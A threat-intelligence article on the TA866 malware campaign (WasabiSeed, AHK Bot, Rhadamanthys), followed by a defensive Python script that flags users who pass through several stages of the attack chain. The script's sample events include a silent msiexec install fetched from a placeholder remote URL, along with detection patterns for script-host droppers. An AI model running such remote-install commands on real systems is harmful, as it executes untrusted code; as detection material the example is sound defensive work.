A previously unknown threat actor, dubbed TA866, has been targeting companies in the U.S. and Germany with bespoke malware designed to steal confidential information. Enterprise security company Proofpoint, which is tracking the activity cluster under the name Screentime, said the group is likely financially motivated. The campaigns have been ongoing since October 3, 2022 and have employed a variety of malicious attachments and URLs in order to initiate a multi-step attack chain. The payloads used by the adversary range from macro-laced Microsoft Publisher files to JavaScript files and the MSI installer WasabiSeed, which can fetch next-stage malware from a remote server. Post-exploitation malware is also distributed, with select attacks deploying an AutoHotKey (AHK)-based bot to drop an information stealer named Rhadamanthys. The adversary is also using a traffic direction system (TDS) called 404 TDS, enabling them to serve malware only in scenarios where the victims meet a specific set of criteria.
The origins of TA866 remain unclear; however, Russian-language variable names and comments have been identified in the source code of AHK Bot, a 2020 variant of which was employed in attacks aimed at Canadian and U.S. banks. The malware is also suspected to have been used as far back as April 2019. Separately, researchers have observed an increase in threat actors using novel techniques to execute code on targets' devices, such as search engine optimization (SEO) poisoning, malvertising, and brand spoofing to distribute malware. Rogue ads on Google search results are also being used to redirect users to fraudulent credential phishing websites.
It is important to note that, for a compromise to succeed, a user must click on a malicious link and, if the TDS filtering lets them through, interact with a malicious JavaScript file that downloads and runs the additional payloads. As such, it is vital that organizations keep their network security controls up to date to protect themselves from such attacks. It is equally essential that organizations remain vigilant and educate employees on how to recognize malicious emails and online threats.
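Because the chain described above only succeeds when several user-driven steps happen in sequence (a lure email with a link or attachment, a JavaScript file run by the Windows script host, an MSI installer fetched from a remote URL, and an AutoHotKey-based bot), a defender can correlate those stages per user rather than alerting on any one of them. The following is an added example written for this page, not Proofpoint's tooling or anything from the report; the event format, field names (`ts`, `user`, `type`, `image`, `cmdline`, `attachment`, `has_url`), the two-hour window, the three-stage threshold and the sample events are all assumptions constructed for illustration.

```python
"""Stage correlation for a TA866-style multi-step chain.

Added example for this page, not Proofpoint's tooling. Event dicts come from an
assumed mail-gateway and endpoint-telemetry normalisation step; every field
name below is an assumption, and the sample events are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def is_lure(e):
    # Stage 1: inbound email carrying a link, or a Publisher / JavaScript attachment.
    return e["type"] == "email" and (
        e.get("attachment", "").lower().endswith((".pub", ".js")) or e.get("has_url", False))


def is_script_dropper(e):
    # Stage 2: the Windows script host executing a .js file (the downloader stage).
    return (e["type"] == "process"
            and e["image"].lower() in ("wscript.exe", "cscript.exe")
            and e.get("cmdline", "").lower().rstrip('"').endswith(".js"))


def is_remote_msi(e):
    # Stage 3: msiexec installing a package straight from a URL (WasabiSeed-style fetch).
    return (e["type"] == "process" and e["image"].lower() == "msiexec.exe"
            and "http" in e.get("cmdline", "").lower())


def is_ahk(e):
    # Stage 4: an AutoHotKey interpreter starting on the host.
    return e["type"] == "process" and "autohotkey" in e["image"].lower()


STAGES = [("lure", is_lure), ("script_dropper", is_script_dropper),
          ("remote_msi", is_remote_msi), ("ahk_bot", is_ahk)]


def correlate(events, window=timedelta(hours=2)):
    """Return {user: [stage names seen in order]} for the most recent chain per user.

    Later stages may be reached even if an earlier one was not observed (lost
    telemetry), but stages are only accepted in forward order, and a gap longer
    than `window` between matched stages restarts the chain.
    """
    by_user = defaultdict(list)
    for e in events:
        by_user[e["user"]].append(e)
    chains = {}
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["ts"])
        matched, next_idx = [], 0           # matched holds (stage_name, timestamp)
        for e in evs:
            if matched and e["ts"] - matched[-1][1] > window:
                matched, next_idx = [], 0   # chain went stale; start over
            for idx in range(next_idx, len(STAGES)):
                name, pred = STAGES[idx]
                if pred(e):
                    matched.append((name, e["ts"]))
                    next_idx = idx + 1
                    break
        chains[user] = [name for name, _ in matched]
    return chains


def flag(events, min_stages=3):
    """Users whose chain reached at least `min_stages` stages (assumed threshold)."""
    return sorted(u for u, c in correlate(events).items() if len(c) >= min_stages)


# Constructed sample telemetry; the host name is a placeholder, not a real indicator.
T0 = datetime(2022, 10, 3, 9, 0)
SAMPLE_EVENTS = [
    {"ts": T0, "user": "alice", "type": "email", "has_url": True},
    {"ts": T0 + timedelta(minutes=7), "user": "alice", "type": "process", "image": "wscript.exe",
     "cmdline": 'wscript.exe "C:\\Users\\alice\\Downloads\\Document_7.js"'},
    {"ts": T0 + timedelta(minutes=8), "user": "alice", "type": "process", "image": "msiexec.exe",
     "cmdline": "msiexec.exe /i http://placeholder.invalid/setup.msi /qn"},
    {"ts": T0 + timedelta(minutes=12), "user": "alice", "type": "process", "image": "AutoHotkey.exe",
     "cmdline": "AutoHotkey.exe script.ahk"},
    # bob: lure delivered, but only a local, administrator-driven MSI install follows.
    {"ts": T0, "user": "bob", "type": "email", "has_url": True},
    {"ts": T0 + timedelta(minutes=30), "user": "bob", "type": "process", "image": "msiexec.exe",
     "cmdline": "msiexec.exe /i C:\\Temp\\vendor.msi /qn"},
    # carol: a .js run five hours after the lure, outside the window, so the chain restarts.
    {"ts": T0, "user": "carol", "type": "email", "attachment": "invoice.pub"},
    {"ts": T0 + timedelta(hours=5), "user": "carol", "type": "process", "image": "cscript.exe",
     "cmdline": "cscript.exe build.js"},
]

if __name__ == "__main__":
    for user, chain in correlate(SAMPLE_EVENTS).items():
        print(f"{user}: {' -> '.join(chain) or '(nothing)'}")
    print("flagged:", flag(SAMPLE_EVENTS))
```

On the sample data only `alice` is flagged: she completes all four stages within minutes, whereas `bob` never runs a script-host dropper or a remote MSI, and `carol`'s script execution falls outside the window and starts a fresh one-stage chain. Tuning the window and the `min_stages` threshold against real telemetry is the main work in deploying a rule like this; the forward-order requirement keeps a routine MSI install from being mistaken for the fetch stage.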
In summary, TA866 is an organized actor targeting companies in the U.S. and Germany with bespoke malware designed to steal confidential information. The group uses a variety of malicious attachments and URLs to initiate a multi-step attack chain, and researchers have observed threat actors more broadly adopting novel techniques such as SEO poisoning, malvertising, and brand spoofing to distribute malware. It is essential for organizations to keep their network security controls up to date, remain vigilant, and educate employees on how to recognize malicious emails and online threats. To stay ahead of these threats, organizations should consider working with a professional security provider to protect their networks and data.